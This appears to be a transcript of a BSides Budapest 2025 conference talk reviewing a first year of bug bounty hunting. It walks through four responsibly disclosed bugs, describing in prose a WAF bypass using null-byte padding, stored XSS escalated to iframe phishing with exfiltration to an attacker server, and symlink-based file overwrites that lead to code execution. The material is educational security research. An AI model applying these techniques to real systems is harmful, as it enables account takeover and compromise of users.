← All talks

Bug Bounty Year 1: $0–16k, Low to CVE #BSidesBUD2025

BSides Budabest · 202540:231.1K viewsPublished 2025-06Watch on YouTube ↗
Speakers
Tags
CategoryCareer
DifficultyIntro
StyleTalk
About this talk
Bálint Magyar - Bug Bounty Year 1: $0–16k, Low to CVE This presentation was held at #BSidesBUD2025 IT security conference on 21st May 2025. A bug safari for beginner level professionals and enthusiasts, showcasing 5 simple but interesting bugs, and some lessons learned in year one of hunting. Slides: https://bm.gy/bsb2025 Articles, etc.: https://bm.gy https://balintmagyar.com/ https://bsidesbud.com All rights reserved. #BSidesBUD2025 #bugbounty #cve
Show transcript [en]

Without further introduction, I'll just hand you over to Madar Baliant. Thank you very much and uh thank you all for joining. Uh so this is bug bounty year 1 from 0 to 16 kilo to CVE. Uh and this is going to be a brief overview of um about a year of bug hunting um that I started early last year. Um but before I begin, I want to do a really quick survey. How many of you have participated in a bug bounty program before? Disclosure programs count. All right. How many of you want to participate at some point? Maybe. All right. There's a couple. I I hope uh this talk will increase the number of those people. So, um yeah, let's get

into it. Uh real brief intro. Forgot to start my timer. My name is Valent. Um my pronouns are they them. I'm a hacker. I make games. I make music, art, all sorts of creative things. Um I've actually been uh professionally a designer for over 15 years. Um, I've uh recently transitioned over into uh cyber security and now I'm a red team and validation engineer uh at the same company where I was a designer before. Um, and I've been hunting bugs since uh early last year. Uh, and real quick about the agenda, we're going to look at the year from like a bird's eye view uh just to give you an overview. Um, and the main part

of this presentation will be a little box safari on four bugs that I bring you. um an SSO bypass, a leak of uh personally identifiable information, an account takeover, and the client side remote code execution um with some closing notes at the end. And I'm going to try to uh include some lessons I learned from each of these bugs uh for context and um for hopefully for your learning benefit. Um u many of you might have more expertise in some of the areas that I'm going to touch on uh here but uh there are going to be uh um explained uh on a on a low level um for the sake of beginners. This video is going on

YouTube as well. So probably a lot of people who are just starting off uh are going to watch this. Uh so hopefully this box will give you some context on uh this journey. Um and I hope I can highlight the uh sort of increase in complexity as I uh learned uh through um throughout the year. But I do want to preface this that I was not completely new to this. I basically um in the general term of the sense I've been hacking uh since I was a child. Um I started off with uh computers running DOSs. Back then you had to do a lot of tinkering sometimes even just to get the things you want to run to run. Um so

there's some background there. I have been a hobbies developer for many years making personal tools um video games uh little stuff um and I have been working with software developers as a designer for more than a decade so I saw the sausage being made uh and I think that's a very important context here um I have completed several app security related online courses and did a lot of labs um and I as you'll see in the timeline in a second I would say that my buck hunting endeavor is like bordering on obsession Um, and I just wanted to give you this context. If you're um very new at this, this is this should not be a benchmark

for what you uh can and will achieve within a year. Uh, I would say I spend an unhealthy amount of time and effort on this. Uh, but uh I hope it it will still be educational uh in terms of what I actually found. All right, so let's move on to a little overview. Um, I actually kept the time for all the time I spent hacking uh throughout these approximately 12 months. um which added up to about 1,200 hours. Uh you can see a summer break and a winter break there. Uh but other than that, I was basically hacking every single day, averaging out to uh over the 365 days about 3 to four hours a day. Uh

but uh normally I did uh about four or five hours on a weekday after work uh and then 10 to 12 uh sometimes 14 hours on week weekends. Um yeah, so that's what I meant by obsession. So this um this is not something that I would recommend replicating uh just for for context on how much time I spent on this. Um and at the end end of the 12 12 months I had uh four low bugs uh two mediums, one high severity and one critical severity which added up to about $16,000 total. All right, so here comes the main bit of the presentation where I'm going to walk you through uh those four bucks and sort

of illustrate what I've learned through them. Pug number one is SSO bypass. I'm going to whis through this because it's um pretty basic. Um we have a a a pretty normal web app on example.com here. When you wrote the main application, it loads. That's it. Um I discovered dev.example.com which was a pre-production environment. Um and it turned out to be protected by employee only um single sign on. Um so for context for this I was basically doing manual hacking. Uh I was observing uh differences between uh how the two domains uh react what kind of headers I get back etc. Obviously for a lot of the um paths I was trying uh I was just

getting the the entra uh ID Microsoft SSO redirect. Um but I did notice something interesting on the u main apps proxying behavior. Um so I noticed a difference in response headers uh between some paths on that application. Uh for example on the top level uh directory uh stuff I I uh requested from the server was ser from server one based on some information from the headers. Uh but when you looked at stuff in the static directory um I got different headers. Uh so that suggested that it was coming from a different server. Please come in. Plenty of seats. Started a bit early here. All right. Um, yep. So, the bypass was very simple. dev.agample.com gave me the

Microsoft uh SSO. But when I went to dev.exagample.com/static, the actual web application loaded. It gave me a soft 404 um but the actual full JavaScript application loaded and um the app was fully functional after that point. So, the bug is info disclosure um by SSO bypass. Uh it was a low severity bug and it got me a $200 reward. Um the lessons learned here were uh this was very early on so this was very very important to me uh as a beginner and I made the beginner's mistake of basically blowing up the impact in my head. This is the end of the world. I can access a pre-production uh client code and the target basically went like me.

Um yeah so risk ultimately the risk and the the level of threat is uh determined by u the target and you can't really do much about it. So it's in your interest to understand that ahead of time so you know where to spend your time. Um mind the details compare and contrast. If I had not noticed the subtle differences uh for what uh certain paths returned on the main application I had not I would have not noticed this uh uh difference in the in how it was proxied and then probably the way the SSL was configured versus how that that kind of proxy was configured was what uh gave rise to um this vulnerability. Yeah. So try to

understand the infrastructure based on what you're seeing. Um look at everything with a with a magnifying glass and take plenty of notes. Uh I'm not going to keep repeating this for all the bugs, but it's so important. Um because often times uh even for something simple as this, uh you don't find it very straightforwardly. You find a little bit of information one day and another one um a week later and after a while you are able to connect the dots. Um so it's really important to keep track of those notes. All right, moving on uh to this leak of personally identifiable information. Um as an overview, this was a large target with many client applications. Um

many of the client applications shared this um admin API. Um and the way I approached this was basically a a very wide recon. Um and uh yeah source code review because uh as it turned out uh this uh customer had plenty of applications uh client applications with source map code which gave me a lot of information. Um, so what I was looking at here specifically was this admin API. Uh, and uh, it had a bunch of endpoints, but it basically returned a 401 unauthorized when you just try to u do a get request to it. And the API flow for admin users themselves uh, was pretty standard. Uh, you submit a username password, you receive a JSON web token

um, and then you request the author uh, the uh, authorized um, endpoints with that token and then you get the response from the API. Nothing special. Um and as I did my recon on this uh um target and they had a wildcard domain. So they had extreme uh numbers of uh subdomains that were in scope. Uh I did a lot of fuzzing with standard verb lists that you will find in um repositories like uh payloads all the things or um set lists and uh I through this fuzzing I found a pre-production client that had source map client code which gave me a lot of u information to work off of to tailor my word lists. So

I used the info in that source code to build a domain specific word list for this target. Uh which actually led me to find uh some other clients uh that the standard word list didn't turn up to me. Let's just call one um that's uh uh important here. This satellite-dev.example.com. So if you look at this um pre-production version of the satellite client um based on the uh source I deduced that it was used for some sort of automation the code was s sourcemapped lucky for me and it consumed the same um admin API as the users um the admin users on the main application but the authorization and the authentication differed from those of actual human end users.

Um, and it was pretty simple. Instead of logging in with a p a username and password, um, this client just sent the request to the API endpoints, but it had these two special HTTP headers, XC client and X key, which contained, um, some form of secrets uh to authenticate and then they got the uh, response based on that. So, like I said, the satellite client source was source mapped and unfortunately for them, they did something really bad. don't see a lot of uh don't hear a lot of gasps so probably not a lot of NodeJS devs in the audience but this is not a great idea. Uh this client basically pulled in the entire process environment

variable context onto the client side um which is not good. Uh and it allowed me to see things when I ran this client in the browser uh such as the values for those xline and xcle headers um that were required for this admin API call. Uh so I took those values and I sprayed it all over the the list of endpoints I had for this API. Uh but unfortunately I got 401's except for one endpoint which started spewing JSON at me. It's went by like really fast. Um it turned out was thousands and thousands of user uh records containing very sensitive private information. All right. So the bug pretty simple. Um it's a credential leak right of the X

client X key values. Sorry. And it's some form of credential sharing between production and pre-production environments. Uh but that was not the bug. The bug was that when you uh access the 40 uh the endpoints, you got a 401, but when you had anything in these two header values, you got an okay response with all of the data there. So ultimately, it was a PI leak via authorization bypass. Over 10,000 user records. Uh, this was a critical and I got a $3,000 reward for it.

Lessons here. Um, if you go wide, then use that information to connect the dots. Um, I had a lot of, um, info about what kind of subdomains this, um, customer had, uh, this target had, um, with all sorts of clients in there with source code. uh use that to your advantage um to for example tailor your word lists that are specific to that target's domain. Uh I think this is very important. Um and yeah, I'm going to echo something here that many top hackers say, which is recon is for finding things to hack on. It's really satisfying to just uh throw a word list at a fuzzer and see all the subdomains pop up and the and the paths and end

points and whatever, but if you don't actually go look at them, they're not very useful. So go do that. um two tools there that uh I found really helpful uh to sift through uh the noise and um find um find the things that are interesting. And yeah, uh it's a good idea to keep track of your IPs. In this case, because it was a PII leak, uh the customer, the target really wanted to make sure uh that nobody else had accessed uh that um list without authorization. Um so they asked for my IPs so they can they could make sure. All right, onto this account takeover. This is going to be a bit more complex.

So, um the actual uh depiction of this target here is going to be a bit contrived. Uh I had to conceal what the uh what the actual target was here. Um and it's sort of unusual, but bear with me. Just focus on the functionality of the application. Um so they had uh user editable sort of public pages. Uh you had to know a unique page ID to be able to view these pages. Uh but it they were editable if you logged in with a that unique page ID itself uh a username and the phone number. I know weird just bear with me. Um so to look at this uh visually we had this uh view only uh

state where if you had the unique page ID then you can just visit the URL and get some nonsensitive data back uh um regarding that user. And then if you wanted to log in again providing this page ID, a username and a phone number. Once you're logged in uh you get this uh session cookie as well as the ability to add that session ID to the URL and arrive at the logged in uh state which is uh going to be very important. And here you could see some more uh information sensitive to the user and you could edit some of that data um as the user and we're going to focus on that uh field called private data there.

So my approach here was again manual hacking u and source code review. Um and basically uh what I tried uh what what I had the idea for is that since the um uh page allows you to get to a logged in state with that session ID in the URL. Maybe if I found um cross-ite scripting on this logged in state, I can take that logged in uh that URL that results in logging in the visitor, send it to a victim and then have uh that caright scripting trigger. So uh I wanted to use the private data field for that which was one of the uh fields that were editable. Um, and uh, I just started basically uh, putting an

innocuous um, HTML tag in there for the underline just to see if it HTML injection worked. But uh, it turned out there was a web application firewall somewhere in between uh, that blocked all the useful characters for HTML injection. So I got a 403 forbidden. Um, but I did not stop here. I remember there were techniques for uh, bypassing WS. Um, one of those being uh, no waffles from the wonderful people at Asset Note. Uh, it's actually a burpuite plugin, but um, I just used the m um, I just went with manual hacking and use the same principles um, as they did for the plug-in. Basically, it works like this. Uh, WS have limits on how much of

a request a post request body they will check. Um, and there's a threshold for that which has defaults between for most WS between 8 to 128 uh, kilobytes. So if you have your malicious payload below this threshold in the post body um then the WS will just ignore it. So that was the idea prepand garbage somehow that allows my payload to get through and bypass the web that way. So it was a question of finding the right kind of garbage which I love that I can say that in hacking uh and often times that is the task in hacking the right kind of garbage. Um and I started basically injecting stuff uh anywhere I could. Uh for example, the

value of the new garbage key here as an example. I got a 500 internal server error which suggested there were uh checks other than the uh w uh before that um on some form of validity. I tried the key name uh that also gave me a 500. I tried putting garbage outside the JSON structure again 500. Um, and then eventually I got this unique response for uh the contents of the email field which gave me a 400 um instead of a 500 or a 403 and it gave me a verbose error about the email field value being too long. So I I pushed on and I tried putting more stuff into it. Uh and I eventually got to just spaces

um here underscores for visibility. Um and uh what struck me was that when I included spaces, I got the response from the W instead of any sort of um 400 or anything uh which suggested to me that there was something happening here that I'm I'm not accounting for. So um at this point I had enough information to sort of try to build the logic in my head, figure out what was actually working uh happening behind the scenes. Uh so that's what I did. Um it looked like there was some form of valility uh check on the JSON syntax itself. Uh not surprisingly um there was it seemed there was some sort of validity check on

what's what kind of keys were present or not present. And then there was uh a check for the actual values of those uh fields in the form of um are they the correct type? Uh are they below a certain length? Um and then eventually the question got to the w is this okay to go. So I continued pushing on u with the email field and I added 8 kilobytes of spaces u with high hopes u but unfortunately I got the uh 403 response again from the w. So that led me to believe there was a step I might be missing in my own model for what's happening. It's valid JSON. It's a valid fields. um there might be a trimming of

whites space at some point after which the length of the uh the email field value in this case is checked and then it gets to the graph. So the task was to find whitespace characters that don't get trimmed maybe but they do contribute to the length of the of of the uh request um and they are also uh not considered for the length. Um yeah, so I I very quickly found um very quickly got to the zero bytes here uni code encoded for for the valid JSON. Um and uh with a short uh um value here, I I just got the W forly forbidden. But when I did the 8 kilobytes, it actually did the bypass.

All right. So now we can inject HTML into this logged in state for this malicious uh um um actors uh logged in page.

So um I needed to find out what sort of uh accesss could work here. Um and I did the classic thing just inject an image uh broken image with the error handler. Popped an alert. Great. So we have JavaScript executing there. Nothing stopping us. Um so I started thinking about what sort of payload uh we could put there that could uh achieve impact. Um the obvious one would be to just make a get request uh with a fetch call um to an attacker cordural server and maybe pass in the the cookie uh for for the logged in session in the URL. But if you paid attention, you might notice there are uh at least one problem with this.

But there's another one too. um there was a length limit on the uh actual private data field length um and it was 60 bytes. So that example particular example would not have worked. And the other one is because we have the session ID in the URL the person who's logged in is us. So the only cookie we could exfiltrate is our own which is not helpful. So how did I get around this? Um my idea was to basically uh first to get over the length um because to get around the limitation with the um like the session overriding I need to uh put in a a much longer payload um but I was limited in

length. So I wanted to basically infiltrate the the payload somehow. I remember this technique where you basically use the URL uh fragment or a hash uh the part after the hash mark in the URL to smuggle in the code. Um and then just use the stored XSS that we have on the page to evaluate the code from the URL slicing off that uh hash. Um and just as a treat, we can also uh encode it for uh B 64 uh which is still under the 60 car care car limit. Um so that's what the payload will look like. uh obviously much longer with the encoded payload there. The actual exploitation then looked like this. We

have the uh payload in the URL. We have the stored XSS on the page in the form of the image evaluating um the code from the URL and then the actual payload itself encoded is uh something like this. We find a container uh on the page. We replace it or inject u an iframe uh that is pointing to the legitimate login screen itself. on the target and we add some CSS to basically blow it up and cover the malicious attacker page with a legitimate login page and then we have some code in the background that checks for the login page actually being being filled so we can um as soon as we can uh exfiltrate

uh the data. So visually this it looks like this. Um we have our iframe injection with the login there and then we add some CSS to blow it up and just conceal everything. So the only thing the victim can see is a weird URL, but I think we're pretty used to that in 2025. So yeah, that's um that's fishing using the legitimate login page itself, which I found very amusing. Um and it was this web bypass to stored XSS to DOM XSS eventually leading to account takeover. Um the severity was medium and there was a $500 reward uh which was a little disappointing um because uh yeah not all programs cap account takeover with excss

at medium. It makes absolute sense in the in the CVSs uh world when you when you um evaluate the actual attack. Uh but as a hacker obviously I spent a lot of time on this and $500 didn't uh really seem um measurable. All right. Yeah. So some lessons learned learn your targets framework. Um the way I found that um XSS will actually uh by looking through the the React code for this which was source map. Um uh React has this uh attribute called dangerously set inner HTML uh which is a dangerous thing to use and this particular app used it. Uh but if I didn't know the basics of React, I probably wouldn't have even searched for that in the first

place. So learn at least the basics of the framework your targets using. Don't let a W stop you. There's multiple ways around it. Um and try to understand backbox logic like I did uh with the um API to update the data there. Uh basically a scientific approach of tweaking just one thing and seeing what changes in response is a is a helpful tool for that. Yeah. And this is uh something uh I think beginners make uh a mistake beginners make a lot which is just stopping at whatever code execution. In this case, if I had stopped at uh just alert, uh I would have probably not even gotten the the medium payout because it doesn't demonstrate any sort of impact

to the customer that is meaningful to them. So, keep pushing. Um obviously, if you find a critical like the PII leak I showed you earlier, you have to report that immediately. Uh but if you if you can escalate something, then you should try. Um but read the program scope um and what's out of scope and what's not because you can get in trouble. Yeah. And some programs I learned cap accesses at medium even if it's full account takeover. Uh that was pretty frustrating but there you go. Um if you're lucky the program actually lists in the policy that they do this. Uh that way you can avoid them and get paid. All right. So the final buck here um we have

this client side remote code execution. Uh this was on an app called Google Web Designer. And I can disclose this because this is uh uh published now. You can find it on my blog. I'll post the uh URL later. Um, and it was specifically on Mac OS and Linux. Uh, but this is a Chromium embedded framework application which uh is basically like Electron if you're familiar with that. It's essentially a browser running natively. Um, and then you run a web app in front uh inside of it. This is how um Slack works for example um and a bunch of other apps. And this is what Google Web Designer looks like. I wouldn't fault you if you

hadn't heard about this before. Um, this is an app that has been out since 2013, making it probably one of the oldest uh, Google applications that are still being updated. Um, and uh, yeah, it's pretty obscure, but apparently it's in use, and apparently they care about it. So, I hacked on this. Yeah. And it's basically a visual um, ad editor for HTML 5 based uh ads. And my approach was mostly manual hacking. Um, I did some source code review. The source was minified. So this is JavaScript running inside that native app shell that is essentially a browser. Um the source code was was minified but that didn't deter me. Um it's you know rough getting through minified code but

uh if you know where to focus or if you have access to a debugger which you would for most web applications for example um then it's uh definitely not impossible and it also makes you learn a bunch of stuff about JavaScript which is cool. And I also used um this tool called eststerase on Linux to monitor the file operations um and process execution uh because that's not something the JavaScript can do directly. It's done by the appshell. All right. Uh so this vulnerability has to do with the browser preview function of this application. Uh basically as a user you would edit your ad. You want to see it live in a browser. You click a

button. It opens a brow opens your ad in a browser. That's it. Behind the scenes what happens is uh you have this folder with your HTML file. We have bunch of JavaScript boiler plate all your images etc. Um when you click preview uh the app creates a folder under that folder um with the name GWD preview and then the name of your ad and this is the vulnerable operation. Um and then it copies everything uh under that in a flat structure. uh and it then launches a local web server and basically uses that preview directory as the root of that web server to show you your ad. This is required because all the weird JavaScript stuff that Google is doing

with Google ads um that is is uh calling out to other servers and it can't just open a local file and show it to you like that. All right, so let's zoom into that vulnerable copy action. Um normally this wouldn't be anything special. You have your uh friendly ad folder there with an assets folder. Um and then it has an HTML file and under the assets there's an image and when you click preview uh that preview directory oh no my laser pointer doesn't work. Um almost anyway so there's that directory create there for the GWD preview friendly ad and then the structure gets uh flattened uh into just the list of files based on uh the parent directories

contents. Um, a little aside on symbolic links. I'm assuming most of you know this, but uh just a brief explanation here. Uh, basically on on uh on many operating systems, you can create these uh virtual files that point at other files. In this example, uh my cool link file when read by an application that follows symbolic links would lead to the contents of uh test.txt instead. um and abusing that uh in combination with this uh copy mechanic. Uh what an attacker could do is include that preview directory uh already when as part of the malicious package um and then in that directory have a symbolic link that points to somewhere nasty and then have an asset with the

same name as the symbolic link which will then get overwritten following the symbolic link to that nasty place. Uh so in this case because the preview directory already exists when you click preview it doesn't get created it doesn't get deleted or anything um your add HTML file gets copied in there and then your assets get copying it in there and in this case the asset has the same name as uh symbolic link in the preview directory which gets followed to place file. So that's arbitrary file rights. Um we can create or overwrite files in this manner. um it can only write into existing directories though. So those were the those were the constraints uh I

had to work with to find a way to escalate this. I could have stopped at arbitrary fire right but I had uh learned that it often leads to rce so I was really interested in finding how that was possible here.

All right so um I found some naive techniques uh as a beginner. I'm sure there's plenty more um where this came from that are are much more efficient um and elegant, but what I found was on Mac OS, you can basically plant um a launchd agent, which is a uh descriptor XML uh that tells the operating system what to run and allows you to run um arbitrary scripts. And on Linux, I decided to go with this uh overwriting of the HTTPR uh HTTP and HTTPS URL handlers uh so that when the user clicked on a link anywhere outside of a browser essentially whether it's an email or even inside the web designer application itself, it would

launch the malicious handler instead of the the browser. So on Mac OS um I had to plant one file which is this uh XML file uh in this P list um format and it just runs a a script that pops up a dialogue with some user information in it as an example. And then on Linux we actually need two files. uh one is the desktop entry that defines what to run and again it's a dialogue that pops up some user info and system info and then another file that actually defines the handler for HTTP and HTTPS um with uh the reference to this desktop file and then what we need to do is we need

the right symbolic links in the preview directory um so that these files uh these payloads end up in the right locations to cause some havoc Um the problem was all these files needed to go under uh the home directory of the user for which the attacker would have had to know the name of the user ahead of time if we were to use an absolute path. Luckily symbolic links can be created for relative paths. So if we had sim links in the preview directory if we pointed two directories up we would be in the home directory. But I didn't want to stop here because that would mean uh we have to expect users to put this ad

in the home directory directly and know where else uh it would work. Um but luckily there's brute force. So if you include a multitude of links that point to various locations, uh it turns out the application doesn't really care. The copy actions just fail silently um if there's, you know, not an existing directory there to copy into. um where that that config for example uh directory would exist. Um so I could just include as many of these as I wanted. I included six from my PC um to uh get a bigger impact by reducing the the sort of requirements pre- reququirements for this to work. Um so basically you have all these copies for symbolic links for the at various depths

and then you need copies of all the payloads with the uh appropriate names so that uh the app takes them and overwrites uh to follow the uh symbolic links. Um and then finally some uh HTML um to have references inside the ad h file uh so that these uh files get copied in the first place and ultimately they end up in a zip file. Uh zip very handily supports preserving sim links uh with this dash uh y parameter so you can pack everything up and um yeah get it to your victims. So ultimately would look like this. Um that's pretty small to read but I'm going to walk through the steps here. Basically the attacker uh creates

zip file with the sim links and everything um and the file and the directory structure required for this. They distribute the zip file. However, these days it would probably be like malvertising for keywords like cool ad template 2025 or something. Um and then the victims would download and extract that file, open it in Google web designer uh and use as part of their normal workflow. They would edit their ad to their liking and then use the pre preview function eventually. And that's when um our payloads get placed and then eventually the code will execute based on um what I what I said before. So the bug here client side RC with improper um sibling handling. Uh this

was interestingly initially rejected by Google uh because they said it depends on social engineering and they can't do anything about that. uh and I argued that uh you can't do anything about the social engineering but you can reduce the impact when it happens. And they actually eventually accepted it based on that uh and got a high severity and an 11 $11,000 reward. And this was also my first CV. So I'm I'm incredibly proud of this. Uh it was it was a it was a very fun client. All right, lessons learned. Um, this was a big one for me and I think many beginner bug hunters. Get comfortable with being uncomfortable. Uh, if I hadn't been nudged by a friend I made in

in bug hunting communities, um, I would have not went for Google probably because who wakes up after a few months of hacking thinking I can hack Google, I can hack Meta, I can hack Apple. Uh the good news is these companies are ran by humans as well. And sometimes you find uh gems like this um this app that were basically in hiding for over a decade with a textbook Simlink um following bug like this one. Yeah, don't get scared by minified code. Uh you don't always fight source map code. Most often you probably won't. Uh but you can use stuff like symbol renaming in um VS code and other IDs where you can just uh um because the the

ID has some sort of uh logical representation of the code uh that you're looking at. It doesn't do a find and replace when you rename a symbol. It actually only uh renames the relevant symbols if it's in the local context for whatever function than just there. Um so eventually you can uh by focusing on the the parts of the application that are interesting to you in terms of uh return on investment uh you can start filling in the blanks renaming stuff and figuring out how the code works. Yeah. And there's a whole world outside of the web. I would not have occurred it would have not occurred to me to uh try to hack a native app. Um obviously this

is a web app running in a in a in a native browser. Uh but this happens a lot and there's plenty uh plenty of apps that work like this. I think there's very interesting um uh things happening when those uh security boundaries are crossed for like the JavaScript itself can't directly write files um but it interfaces with that appshell somehow and then appshell interfaces with the operating system. Uh which leads to stuff like this one. Yeah. And dig dig deep into the scope. Uh, like I said, this app's been out since 2013, probably with this preview function in there. Uh, and for 12 years, nobody found it. This is mind-blowing. Um, yeah, and argue impact, but you in

order to be able to do that, you have to understand it yourself. Um, so don't just, you know, keep banging uh the table that your low is actually critical, but if you can explain why it's high impact, um, then you might get some, um, some return for that. All right. some notes to close out.

If you work in tech, and I'm assuming most of you here are in some form or tech adjacent, you have an advantage. If you want to start bug bounty, you have an advantage. You understand what a server is, what a client is. If you have seen an HTTP request, you are way ahead of most beginners. um and not necessarily on the nitty-gritty technical level, but just the conceptual understanding of how computers work, how the internet works, how uh networks work, um how stuff like, you know, uh JavaScript works. That's that's a huge advantage. Um I did say that there's a world outside of web, but I would focus on web first. Obviously, most apps out there

are uh with bug bounties are web apps. Uh and that's where most of the learning material is. I think it's a it's a great introduction. Uh I would highly recommend you join u bug bounty related communities. There's all sorts of podcasts, YouTube channels, etc. They mostly have their own discord channels. Um it's a it's a really powerful way to expose yourself to a lot of creative ideas. Uh and I have found multiple of my bugs because of ideas I got from random conversations. Yeah. And it has been never a better time to learn. Uh there is so much educational material out there whether you prefer to read or watch a video or listen to a podcast, it's all out there.

So I would highly recommend it. And ultimately I think I've learned that hacking is failing but persisting regardless. Um and I think it's true for basically anything in life that's worth uh uh doing. Um many creative processes also you fail, you hit walls, you learn what went wrong. Um you tweak your approach, you see what changes. Um, and eventually you find something. Thank you.

Thank you, Valent. Um, we have some time before uh Kat Fitzgerald's presentation. So, do we have any questions for Barlind? I'll be around. Um, so you can feel free to approach me. I'm happy to answer any questions. There's the answer. Okay, we just have a few a few minutes while uh Cat sets up and then we'll move on for the uh final presentation of the morning session. So, if you just bear with us, we'll have the next presentation very shortly. Thank you.